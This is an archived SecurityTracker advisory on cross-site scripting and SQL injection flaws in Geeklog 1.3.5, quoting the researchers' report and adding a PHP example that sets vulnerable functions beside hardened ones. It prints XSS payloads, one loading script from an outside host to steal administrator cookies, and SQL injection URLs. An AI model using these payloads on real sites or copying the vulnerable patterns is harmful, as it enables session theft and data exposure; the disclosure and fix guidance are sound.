SecurityTracker.com

SecurityTracker
Archives
Category:   Application (Forum/Board/Portal)  >   Geeklog Vendors:   Geeklog
Geeklog Web Portal Software Permits Cross-Site Scripting Attacks and May Allow Remote Users to Execute Arbitrary SQL Commands on the Database Server
SecurityTracker Alert ID:  1004499
SecurityTracker URL:  http://securitytracker.com/id/1004499
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 10 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.3.5, 1.3.5rc1, and prior versions
Description:   Several vulnerabilities have been reported in the Geeklog web portal software. A remote user may be able to inject SQL commands to be executed by the underlying database server. Also, a remote user can conduct cross-site scripting attacks.

ALPER Research Labs reported that the user-supplied '$url' variable submitted for administrator review with a new Calendar Event is not filtered. A remote user can submit HTML containing malicious scripting code in this variable, causing the arbitrary scripting code to be executed by the administrator's web browser when the pending event is reviewed. This code will appear to originate from the Geeklog site and will run in the security context of that site. As a result, the scripting code will be able to access the administrator's cookies associated with the site.

A demonstration exploit value is provided:

<script src="http://forum.olympos.org/f.js">Alper</script>

Also, a remote user can create a malicious link using the 'index.php' or 'comment.php' scripts to cause a similar cross-site scripting condition. The following demonstration exploit URLs are provided:

/index.php?topic=<script>alert(document.cookie)</script>

/comment.php?mode=display&sid=foo&pid=18&title=<script>alert(document.cookie)</script>&type=article

Finally, it is reported that the '$pid' variable is directly passed to the underlying SQL server. This allows a remote user to create a URL that will inject SQL commands to be executed by the database server. A demonstration exploit URL is provided:

/comment.php?mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

According to the report, the "Magic Quotes" function of PHP will escape the quoting characters, possibly reducing the impact of this flaw. However, if the "Magic Quotes" feature is not enabled, a remote user could cause arbitrary SQL commands to be executed. This could allow a remote user to obtain all available information about Geeklog users from the database.
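The following is an added illustration, not Geeklog's code and not part of the advisory. It shows the three reported patterns (a request parameter echoed straight into HTML, an event link displayed to the administrator, and a '$pid' value concatenated into a SQL statement) each beside a hardened version. The function names, the comments table layout, the example.invalid URLs and the sample rows are assumptions; the demonstration uses an in-memory SQLite database through PDO so that it runs from the PHP command line without a database server.

```php
<?php
// Added example (not Geeklog code): the three input-handling patterns the
// advisory describes, each shown in its vulnerable form beside a hardened one.
// Function names, the table layout and the sample values are assumptions.

// --- Reflected XSS via index.php?topic= and comment.php?title= -------------
// Vulnerable: the parameter is placed into the page unchanged.
function render_topic_vulnerable(array $get): string
{
    return '<h2>Topic: ' . ($get['topic'] ?? '') . '</h2>';
}

// Hardened: encode for an HTML text context. ENT_QUOTES also encodes both
// quote characters, so the same helper is safe inside attribute values.
function html_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function render_topic_hardened(array $get): string
{
    return '<h2>Topic: ' . html_text((string)($get['topic'] ?? '')) . '</h2>';
}

// --- Stored XSS via the calendar event $url shown to the administrator ------
// Hardened: accept only syntactically valid http/https URLs, then encode the
// value when placing it in an href attribute and in the link text. A raw
// <script> element or a javascript: URL is rejected before it is stored.
function event_link_hardened(string $url): string
{
    $scheme = strtolower((string)parse_url($url, PHP_URL_SCHEME));
    $ok = filter_var($url, FILTER_VALIDATE_URL) !== false
        && in_array($scheme, ['http', 'https'], true);
    if (!$ok) {
        return '<em>(invalid link removed)</em>';
    }
    return '<a href="' . html_text($url) . '">' . html_text($url) . '</a>';
}

// --- SQL injection via comment.php?pid= --------------------------------------
// Vulnerable: $pid is concatenated straight into the statement.
function comment_query_vulnerable(PDO $db, string $pid): array
{
    $rows = $db->query("SELECT pid, author FROM comments WHERE pid = $pid");
    return $rows->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: validate the type first (a comment id is an integer, so no quote
// characters are involved and the magic_quotes setting plays no part), then
// pass it as a bound parameter instead of building the statement by hand.
function comment_query_hardened(PDO $db, string $pid): array
{
    $id = filter_var($pid, FILTER_VALIDATE_INT);
    if ($id === false) {
        return [];   // reject the request rather than guess at the value
    }
    $stmt = $db->prepare('SELECT pid, author FROM comments WHERE pid = :pid');
    $stmt->execute([':pid' => $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Demonstration on constructed data (in-memory SQLite, no server needed) --
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE comments (pid INTEGER, author TEXT)');
$db->exec("INSERT INTO comments VALUES (18, 'alice'), (19, 'bob'), (20, 'carol')");

$xss = '<script>alert(document.cookie)</script>';      // payload from the advisory
echo render_topic_vulnerable(['topic' => $xss]), "\n"; // script element survives
echo render_topic_hardened(['topic' => $xss]), "\n";   // encoded, rendered as text

echo event_link_hardened('http://example.invalid/cal'), "\n";   // accepted, encoded
echo event_link_hardened('<script src="http://example.invalid/f.js">x</script>'), "\n"; // rejected

// The advisory's sample sits in a numeric context, so a payload needs no quote
// characters; magic_quotes escapes only quotes, whereas type validation rejects
// anything that is not an integer.
$pid = '18 OR 1=1';
echo count(comment_query_vulnerable($db, $pid)), " rows matched the injected pid\n";
echo count(comment_query_hardened($db, $pid)), " rows returned for the injected pid\n";
echo count(comment_query_hardened($db, '18')), " row(s) returned for a valid pid\n";
```

Run it with `php example.php`. The vulnerable query returns every row of the table for the injected value, while the hardened function returns nothing for it and the single matching row for a well-formed id; the two rendering functions show the same payload once as live markup and once as inert encoded text.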

Impact:   A remote user could cause arbitrary scripting code to be executed on a Geeklog user's or administrator's browser to steal their authentication cookies.

A remote user could inject arbitrary SQL commands to obtain information about Geeklog users from the database.

Solution:   The vendor has released a fixed version (1.3.5sr1), available at:

http://prdownloads.sourceforge.net/geeklog/geeklog-1.3.5sr1.tar.gz

You can read more about this issue at:

http://geeklog.sourceforge.net/article.php?story=20020610013358149

Vendor URL:  geeklog.sourceforge.net/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [ARL02-A13] Multiple Security Issues in GeekLog




+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\-------  Security Advisory  -----/---------/+
+/----------\------    ID: ARL02-A13    ----/----------/+
+/-----------\----- salper@olympos.org  ---/-----------/+


Advisory Information
--------------------
Name               : Multiple Security Issues in GeekLog
Software Package   : GeekLog
Vendor Homepage    : http://geeklog.sourceforge.net/
Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 31/05/2002
Vendor Replied     : 01/06/2002
Prior Problems     : N/A
Current Version    : v1.3.5rc1 (vulnerable)


Summary
-------
GeekLog is a web content management system suitable for 
running full-featured community sites. It supports article 
posting, threaded comments, event scheduling, and link 
management and is built around a design philosophy that 
emphasizes ease of use.

I have found these issues while testing the GeekLog system 
which was to be used at http://www.olympos.org, "Olympos 
Turkish Security Portal".
2 different types of Cross Site Scripting issues, plus 
1 SQL Injection vulnerability, were found in GeekLog.


Details
-------
1. When any user sends a new Calendar Event, the form is submitted 
to the site admin for approval. The $url variable, which holds the 
data given in the "Link" section of the form, is not filtered for 
malicious code. So a malicious user may get the cookie of the site 
administrator and therefore "own" the site.
Also this issue may be exploited to run malicious code on the GeekLog 
site.
Proof-of-concept Link input ($url):
<script src="http://forum.olympos.org/f.js">Alper</script>

2. Maliciously crafted links from third party sites may allow Cross 
Site Scripting attacks via "index.php" and/or "comment.php". 
Two examples for this:
/index.php?topic=<script>alert(document.cookie)</script>
/comment.php?mode=display&sid=foo&pid=18&title=<script>alert(document.cookie)</script>&type=article

3. The $pid variable is directly passed to SQL input. This makes it 
possible for attackers to launch SQL injection attacks.
/comment.php?mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

As the "Magic Quotes" function of PHP escapes the quoting characters, 
this third issue might just cause "light" headaches, but if the "Magic 
Quotes" is not active, the attacker may be able to get all the information 
about users from the SQL tables.


Solution
--------
The vendor replied and acted quickly.
A patch or a new version pointing this issue will
soon be available via CVS or a FTP download from:
http://www.sourceforge.net/projects/geeklog
or
http://geeklog.sourceforge.net

The development team of GeekLog said that they will 
be cleaning out the code for similar security issues, 
which were mentioned above.


Credits
-------
Discovered on 31 May 2002 by 
Ahmet Sabri ALPER <salper@olympos.org>
ALPER Research Labs.

The ALPER Research Labs. [ARL] workers are freelance 
security professionals and WhiteHat hackers. The ARL 
workers are available for hiring for legal jobs.
The ARL also supports the Open Software Community by detecting 
possible security issues in GPL or any other Public Licensed 
products.


References
----------
Product Web Page: http://geeklog.sourceforge.net/
Olympos: http://www.olympos.org/


Copyright 2019, SecurityGlobal.net LLC